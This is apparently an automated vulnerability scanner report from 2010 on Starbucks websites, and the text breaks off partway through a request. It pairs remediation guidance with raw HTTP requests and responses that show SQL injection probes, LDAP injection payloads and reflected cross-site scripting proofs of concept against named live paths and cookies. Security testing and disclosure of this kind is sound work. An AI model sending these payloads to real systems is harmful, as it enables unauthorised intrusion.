SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-reserve-coffee
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 62476475'%20or%201%3d1--%20 and 62476475'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /coffee/starbucks-reserve-coffee?162476475'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 1
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:35 GMT
Connection: close
Content-Length: 52660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <a href="/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi" title="Aged Sulawesi Kalosi"> <img src="http://assets.starbucks.com/assets/aa98bb468e8e4d11bcf9c7c5c337e4fd.jpg" alt="Aged Sulawesi Kalosi Stamp Art" /> <br /><strong><span>Aged Sulawesi Kalosi</span></strong> <br /><span class="family">Starbucks Reserve... Coffee </span> <br /><span class="intensity"></span> </a> </li>
<li class="specialty_roast"> <a href="/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry" title="Brazil Sul de Minas Peaberry"> <img src="http://assets.starbucks.com/assets/84a1915283354bf5af4293a62a6b3175.jpg" alt="Brazil Sul de Minas Peaberry Stamp Art" /> <br /><strong><span>Brazil Sul de Minas Peaberry</span></strong> <br /><span class="family">Starbucks Reserve... Coffee </span> <br /><span class="intensity"></span> </a> </li>
1.2. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.starbucks.com
Path:
/coffee/via/instant-coffee
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13312046'%20or%201%3d1--%20 and 13312046'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /coffee/via/instant-coffee?113312046'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 1
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:02 GMT
Connection: close
Content-Length: 53520
<li class="specialty_roast"> <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast"> <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Dec ...[SNIP]...
Request 2
GET /coffee/via/instant-coffee?113312046'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 2
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:02 GMT
Connection: close
Content-Length: 53065
<li class="specialty_roast"> <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast"> <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Decaf Italian Roast" /> <br /><strong><span>Decaf Italian Roast</span></strong> <br /><span class="family">Starbucks VIA.. Coffees</span> <br /><span class="intensity"></span> </a> </li>
</ol> </div>
<div class="section" id="posts">
<div id="blog-602" class="blog-entry"> <h2><a href="/blog/Perfect-your-Starbucks-VIA-Ready-Brew-Flavored-experience">Perfect Your Starbucks VI ...[SNIP]...
The SITESERVER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SITESERVER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C'; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:25 GMT
Connection: close
Content-Length: 75
The page cannot be displayed because an internal server error has occurred.
Request 2
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C''; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 2
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 168
Content-Type: text/html
Location: /coffee/?CCAID=SBPTPAHP1SHCO&Redir=/coffee/
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:26 GMT
Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/coffee/?CCAID=SBPTPAHP1SHCO&Redir=/coffee/">here</a>.</body>
2. LDAP injection
There are 3 instances of this issue:
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.
The payloads b04135e4d2d6b331)(sn=* and b04135e4d2d6b331)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21174
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:30 GMT
Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="Find every Starbucks Coffee at the Official Online Store."> <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
<script src="/include/LibJavaScript.js" type="text/javascript"></script> <title> Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store </title>
Request 2
GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 2
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21174
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACABBACA=HOJMDLCBHPPELAMPENAAECCJ; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:30 GMT
Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="Find every Starbucks Coffee at the Official Online Store."> <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
<script src="/include/LibJavaScript.js" type="text/javascript"></script> <title> Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store </title>
The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.
The payloads 1a18fdd9ce30786c)(sn=* and 1a18fdd9ce30786c)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 351
Content-Type: text/html
Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=HCKMDLCBEBEEIOJHOPIJIEII; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:39 GMT
Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE">here</a>.</body>
Request 2
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 2
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 351
Content-Type: text/html
Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:39 GMT
Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE">here</a>.</body>
The ASPSESSIONIDCCDDADAA cookie appears to be vulnerable to LDAP injection attacks.
The payloads c20c2704323c6dbe)(sn=* and c20c2704323c6dbe)!(sn=* were each submitted in the ASPSESSIONIDCCDDADAA cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=c20c2704323c6dbe)(sn=*; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCDDADAA=GJHKDLCBKFNCFHEOPBDCFKDD; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:35 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="Shop for Coffee Machines, Espresso Machines and more at Starbucks Store"> <meta name="keywords" content="coffee machines, espresso machines">
<script src="/include/LibJavaScript.js" type="text/javascript"></script> <title>Coffee Machines at Starbucks Store</title>
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 69adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae was submitted in the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter. This input was echoed as 69adb style=x:expression(alert(1)) 21e0c039cae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:17 GMT
Content-Length: 41391
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <param name="flashvars" value="playerType=homepage&playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=169adb style=x:expression(alert(1)) 21e0c039cae" /> ...[SNIP]...
3.2. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af12"style="x:expression(alert(1))"9f35c014f5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <param name="flashvars" value="playerType=homepage&playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=1" /> ...[SNIP]...
3.3. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ed"style%3d"x%3aexpression(alert(1))"7948577bab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb6ed"style="x:expression(alert(1))"7948577bab3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:25 GMT
Content-Length: 56826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee?eb6ed"style="x:expression(alert(1))"7948577bab3=1"/> ...[SNIP]...
3.4. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/learn
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17abe"style="x:expression(alert(1))"ea84b9a66b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/learn?17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:00:23 GMT
Connection: close
Content-Length: 37678
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn?17abe"style="x:expression(alert(1))"ea84b9a66b2=1"/> ...[SNIP]...
3.5. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/learn/clover
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20ec4"style="x:expression(alert(1))"ceb4d722147 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/learn/clover?20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
